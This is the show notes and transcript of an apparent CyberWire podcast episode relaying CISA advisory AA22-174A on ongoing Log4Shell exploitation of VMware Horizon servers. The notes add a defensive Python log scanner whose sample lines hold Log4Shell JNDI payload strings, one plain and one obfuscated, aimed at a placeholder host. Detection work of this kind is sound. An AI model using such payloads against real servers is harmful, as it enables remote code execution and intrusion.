CyberWire Daily - CISA Alert AA22-174A – Malicious cyber actors continue to exploit Log4Shell in VMware Horizon systems. [CISA Cybersecurity Alerts]

Episode Date: June 24, 2022

CISA and the US Coast Guard Cyber Command are releasing this joint Cybersecurity Advisory to warn network defenders that cyber threat actors, including state-sponsored APT actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway servers to obtain initial access to organizations that did not apply available patches or workarounds.

Resources:
AA22-174A Alert, Technical Details, and Mitigations
Malware Analysis Report 10382254-1 (STIX)
Malware Analysis Report 10382580-1 (STIX)
CISA's Apache Log4j Vulnerability Guidance webpage
Joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities
CISA's database of known vulnerable services on the CISA GitHub page
National Security Agency (NSA) and Australian Signals Directorate (ASD) guidance, Block and Defend Web Shell Malware, for additional guidance on hardening internet-facing systems

All organizations should report incidents and anomalous activity to CISA's 24/7 Operations Center at central@cisa.dhs.gov or (888) 282-0870 and to the FBI via your local FBI field office or the FBI's 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.
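The advisory recommends that organizations which did not patch assume compromise and hunt for exploitation attempts. As an added example (not code from CISA, the Coast Guard or this episode), the following Python scan flags the crafted JNDI lookup strings that Log4Shell relies on in web-server log lines, and goes slightly beyond the advisory text by also collapsing the nested-lookup obfuscation (such as `${lower:j}`) that is commonly used to hide the `jndi` keyword. The log format, the sample lines and the regular expressions are assumptions constructed for this example, not indicators taken from the advisory.

```python
import re

# Constructed sample access-log lines (not from the advisory). Lines 2 and 3
# carry JNDI lookup strings in the User-Agent field; line 1 is benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [23/Jun/2022:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Jun/2022:10:02:17 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid:1389/a}"',
    '10.0.0.7 - - [23/Jun/2022:10:03:40 +0000] "GET /x HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${lower:l}dap://example.invalid/b}"',
]

# Single-character nested lookups such as ${lower:j}, ${upper:N} or ${::-j}
# resolve to one literal character and are used to disguise "jndi".
_INNER = re.compile(
    r'\$\{(?:lower|upper):([^${}])\}'      # ${lower:j} -> j
    r'|\$\{(?:[^${}]*:)?-([^${}])\}',      # ${::-j} or ${env:NOPE:-j} -> j
    re.IGNORECASE,
)

# A JNDI lookup naming one of the protocols Log4j could resolve.
_JNDI = re.compile(
    r'\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:',
    re.IGNORECASE,
)


def normalize(s: str) -> str:
    """Repeatedly collapse nested single-character lookups, then lowercase."""
    prev = None
    while prev != s:
        prev = s
        s = _INNER.sub(lambda m: m.group(1) or m.group(2), s)
    return s.lower()


def find_log4shell_attempts(lines):
    """Return (line_number, protocol) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for n, proto in find_log4shell_attempts(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup via {proto} -> treat host as possibly compromised")
```

A hit means an attempt was logged, not that exploitation succeeded; the advisory's next step is the incident response guidance and malware analysis reports it links.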

Transcript
Starting point is 00:00:00 You're listening to the Cyber Wire Network, powered by N2K. Original release date, June 23, 2022. CISA and the U.S. Coast Guard Cyber Command are releasing this joint advisory to warn network defenders that cyber threat actors, including state-sponsored APT actors, have continued to exploit the Log4Shell vulnerability in VMware Horizon and Unified Access Gateway servers to obtain initial access to organizations that did not apply available patches or workarounds. Log4Shell is a remote code execution vulnerability affecting the Apache Log4j library and a variety of products, such as consumer and enterprise services, websites, applications, certain versions of VMware Horizon, and Unified Access Gateway servers. The vulnerability enables malicious cyber actors to submit a specially crafted request to a vulnerable system. The request allows the malicious actors to take full control of the affected system. VMware made fixes available in December 2021. Since then, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing
Starting point is 00:01:21 VMware Horizon and Unified Access Gateway servers. As a part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables, enabling remote command and control. In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data. The alert documentation linked in the show notes provides the suspected APT actor's tactics, techniques, and procedures, information on the loader malware, indicators of compromise, mitigation actions, and incident response recommendations.
Starting point is 00:01:56 The information is derived from two related incident response engagements and malware analysis of samples discovered on victims' networks. CISA and U.S. Coast Guard Cyber Command recommend all organizations with affected systems that did not apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs and the two malware analysis reports provided in the alert resources. If potential compromise is detected, administrators should apply the incident response recommendations included in the alert documentation and report key findings to CISA. or the FBI's 24/7 CyWatch at 855-292-3937 or CyWatch@fbi.gov. This report was written by CISA, the United States Cybersecurity and Infrastructure Security Agency,
Starting point is 00:02:52 and edited and adapted for audio by the Cyber Wire as a public service. Please visit www.cisa.gov to read the full report, which may include additional details, links, and illustrations. A link to this report can be found in the show notes. This has been a CISA Cybersecurity Alert.
